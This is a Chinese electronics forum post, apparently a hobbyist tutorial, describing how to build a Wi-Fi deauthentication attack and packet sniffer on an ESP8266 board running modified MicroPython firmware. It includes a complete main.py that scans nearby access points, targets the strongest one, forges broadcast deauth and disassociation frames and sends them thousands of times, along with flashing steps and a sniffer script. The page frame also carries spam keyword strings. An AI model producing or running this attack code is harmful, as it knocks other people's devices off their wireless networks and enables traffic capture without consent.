久久久久久久999_99精品久久精品一区二区爱城_成人欧美一区二区三区在线播放_国产精品日本一区二区不卡视频_国产午夜视频_欧美精品在线观看免费

 找回密碼
 立即注冊(cè)

QQ登錄

只需一步,快速開(kāi)始

搜索
查看: 4684|回復(fù): 0
打印 上一主題 下一主題
收起左側(cè)

MicroPython實(shí)現(xiàn)wifi干擾與抓包

[復(fù)制鏈接]
跳轉(zhuǎn)到指定樓層
樓主
  0x00前言

  之前做的WIFI攻擊實(shí)驗(yàn)都是基于arduino環(huán)境開(kāi)發(fā)的,最近想嘗試一下使用micropython完成deautch(解除認(rèn)證)攻擊。本次開(kāi)發(fā)板使用的還是TPYBoardv202(某寶上有賣(mài),30元),因?yàn)樗饕墓δ芫褪侵С謒icropython開(kāi)發(fā)。



  0x01實(shí)現(xiàn)原理

  a)        通過(guò)查閱資料和arduino的源碼分析,了解到實(shí)現(xiàn)攻擊其實(shí)就是發(fā)送IEEE802.11協(xié)議解除認(rèn)證包,根據(jù)MAC層幀格式發(fā)送自定義的虛假deautch數(shù)據(jù)包。

  b)        調(diào)用ESP8266SDK中wifi_send_pkt_freedom函數(shù),發(fā)送攻擊包。

  0x02攻擊構(gòu)思

  a)        程序一開(kāi)始掃描附件的AP。

  b)        找到信號(hào)最強(qiáng)的AP,獲取到他的MAC地址(bssid)和信道。

  c)        將TPYBoardv202切換到同攻擊AP相同的信道。

  d)        使用攻擊AP的MAC地址,組合deauth解除認(rèn)證包發(fā)送。

  0x03編譯燒寫(xiě)固件及程序源碼

  1、        編譯固件

  現(xiàn)有的micropython-esp8266固件中,并沒(méi)有引出wifi_send_pkt_freedom函數(shù),于是

  我自己動(dòng)手編譯了一次固件,地址:

  https://github.com/PakchoiFood/micropython-deauth

  大家可以自行下載燒寫(xiě)使用,如果有的小伙伴想自己編譯修改固件的話,請(qǐng)參考:

  https://github.com/micropython/micropython/tree/master/esp8266

  需要注意:在編譯esp8266-sdk時(shí),注意版本必須是1.3.0版本,否則wifi_send_pkt_freedom函數(shù)會(huì)一直返回-1失敗。

  下載后解壓,文件如下:



  firmware.bin文件:micropython-esp8266生成的固件。

  增加的內(nèi)容:

  setAttack函數(shù)

  參數(shù):int類(lèi)型(信道)

  功能:設(shè)置esp8266的信道

  send_pkt_freedom函數(shù)

  參數(shù):bytes數(shù)組(定義的數(shù)據(jù)包)

  flash_download_tools_v3.3.6_win.rar:燒寫(xiě)固件的工具。

  MicroPythonFileUploader.rar:用于將程序下載到TPYBoardv202Flash的工具。

  main.py文件:程序源碼文件,主要實(shí)現(xiàn)附件AP的掃描、數(shù)據(jù)包的組合和調(diào)用發(fā)送。

  1. import time
  2. import uos
  3. import wireless


  4. sta_if=wireless.attack(0)#0:STA 模式
  5. sta_if.active(True)
  6. ap_list=sta_if.scan()
  7. print(ap_list)
  8. ssid=''
  9. bssid=''#bssid:AP MAC address
  10. channel=''#信道
  11. _client=[0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]#默認(rèn)

  12. def deauth(_ap,_client,type,reason):
  13.     # 0 - 1   type, subtype c0: deauth (a0: disassociate)
  14.     # 2 - 3   duration (SDK takes care of that)
  15.     # 4 - 9   reciever (target)
  16.     # 10 - 15 source (ap)
  17.     # 16 - 21 BSSID (ap)
  18.     # 22 - 23 fragment & squence number
  19.     # 24 - 25 reason code (1 = unspecified reason)
  20.     packet=bytearray([0xC0,0x00,0x00,0x00,0xBB,0xBB,0xBB,0xBB,0xBB,0xBB,0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,0x00, 0x00,0x01, 0x00])
  21.     for i in range(0,6):
  22.         packet[4 + i] =_client[i]
  23.         packet[10 + i] = packet[16 + i] =_ap[i]
  24.     #set type
  25.     packet[0] = type;
  26.     packet[24] = reason
  27.     result=sta_if.send_pkt_freedom(packet)
  28.     if result==0:
  29.         time.sleep_ms(1)
  30.         return True
  31.     else:
  32.         return False
  33.    
  34. if __name__=="__main__":
  35.     max_rssid=0
  36.     max_id=0
  37.     num=0

  38.     #獲取信號(hào)最強(qiáng)的AP 進(jìn)行攻擊
  39.     for i in ap_list:
  40.         if max_rssid==0:
  41.             max_rssid=i[3]#rssid
  42.         else:
  43.             if i[3]>max_rssid:
  44.                 max_rssid=i[3]
  45.                 max_id=num
  46.         num+=1
  47.     ssid=ap_list[max_id][0]
  48.     bssid=ap_list[max_id][1]
  49.     channel=ap_list[max_id][2]
  50.     print('ssid:',ssid,'-bssid:',bssid)
  51.     print('-channel:',channel,'-rssid:',max_rssid)
  52.     sendNum=5000#攻擊次數(shù)
  53.    
  54.     print('******************************')
  55.     if sta_if.setAttack(channel):
  56.         print('Set Attack OK')
  57.         time.sleep_ms(100)
  58.         print('---deauth runing-----')
  59.         for i in range(0,sendNum):
  60.             r_=deauth(bssid, _client, 0xC0, 0x01)
  61.             if r_:
  62.                
  63.                 deauth(bssid, _client, 0xA0, 0x01)
  64.                 deauth(_client, bssid, 0xC0, 0x01)
  65.                 deauth(_client, bssid, 0xA0, 0x01)
  66.                 time.sleep_ms(5)
  67.             else:
  68.                 print('---deauth fail-------')
  69.             time.sleep_ms(5000)
復(fù)制代碼




  sniffer文件夾下的main.py實(shí)現(xiàn)網(wǎng)絡(luò)抓包功能。

  1. import wireless
  2. import time

  3. #可以指定信道1~13
  4. sniffer=wireless.sniffer(6)
  5. #0:表示從信道1開(kāi)始 定時(shí)切換信道
  6. #sniffer=wireless.sniffer(0)
復(fù)制代碼




  燒寫(xiě)固件

  1、        TPYBoardv202使用microUSB數(shù)據(jù)線接入電腦。查看安裝的usb轉(zhuǎn)串的端口。打開(kāi)電腦的設(shè)備管理器(這里是COM57)。



  2、        解壓flash_download_tools_v3.3.6_win.rar,雙擊運(yùn)行ESPFlashDownloadTool_v3.3.6.exe。

  3、選擇firmware.bin固件文件,地址0x00000,其他參數(shù)根據(jù)下圖設(shè)置。我的COM選擇COM57,根據(jù)自己的實(shí)際端口選擇,波特率選擇115200。



  4、點(diǎn)擊【START】,界面提示等待上電同步。按住板子上的FLASH鍵不松,同時(shí)按一下RST鍵復(fù)位上電。左側(cè)空白區(qū)顯示讀取的MAC地址,狀態(tài)顯示下載中,此時(shí)松開(kāi)按鍵即可。



  5、等待下載完畢,關(guān)閉軟件退出。

  下載程序

  6、解壓MicroPythonFileUploader.rar,雙擊運(yùn)行MicroPythonFileUploader.exe。



  此軟件需要.NETFramework4.2及以上版本,若打開(kāi)失敗,請(qǐng)安裝.NETFramework后再使用。


  7、選擇COM57,點(diǎn)擊【Open】打開(kāi)串口。



  8、點(diǎn)擊右側(cè)的文件夾圖標(biāo)的按鈕,選擇main.py文件。



  9、此時(shí)可以點(diǎn)擊【Send】,將程序發(fā)送給TPYBoardv202。發(fā)送成功后,程序自動(dòng)運(yùn)行。



  10、接下來(lái)將sniffer下的main.py同樣的是方式下載到板子里。(文件會(huì)覆蓋)

  打開(kāi)串口助手,就可以看到esp8266抓包的數(shù)據(jù)。





分享到:  QQ好友和群QQ好友和群 QQ空間QQ空間 騰訊微博騰訊微博 騰訊朋友騰訊朋友
收藏收藏1 分享淘帖 頂 踩
回復(fù)

使用道具 舉報(bào)

本版積分規(guī)則

小黑屋|51黑電子論壇 |51黑電子論壇6群 QQ 管理員QQ:125739409;技術(shù)交流QQ群281945664

Powered by 單片機(jī)教程網(wǎng)

快速回復(fù) 返回頂部 返回列表
主站蜘蛛池模板: 伊人中文字幕 | 亚洲国产aⅴ成人精品无吗 欧美激情欧美激情在线五月 | 免费看黄视频网站 | 精品久久av | 国产极品粉嫩美女呻吟在线看人 | 亚洲精品天堂 | 理论片午午伦夜理片影院 | 中文字幕亚洲一区二区三区 | 中文字幕高清一区 | 国产日韩欧美 | 日本精品一区二区三区在线观看视频 | 91在线视频播放 | 97国产精品 | 在线激情视频 | 免费看a| 91精品久久久久久综合五月天 | 亚洲精品无人区 | 中文字幕精品一区 | 国产视频第一页 | 欧美三级成人理伦 | 91视频一区二区三区 | 亚洲精品中文在线 | 中文字幕精品一区 | 日韩伦理一区二区 | 日韩成年人视频在线 | 成人在线播放 | 国产成人精品综合 | 亚洲免费成人 | 成人午夜影院 | 久久久婷婷 | 亚洲成人久久久 | 精品国产乱码久久久久久老虎 | 欧美国产一区二区三区 | av永久免费 | 一区二区三区高清不卡 | 99久久精品国产一区二区三区 | 亚洲免费视频播放 | 日韩亚洲视频 | 日韩成人在线免费视频 | 宅男伊人 | 久久精品国产一区二区 |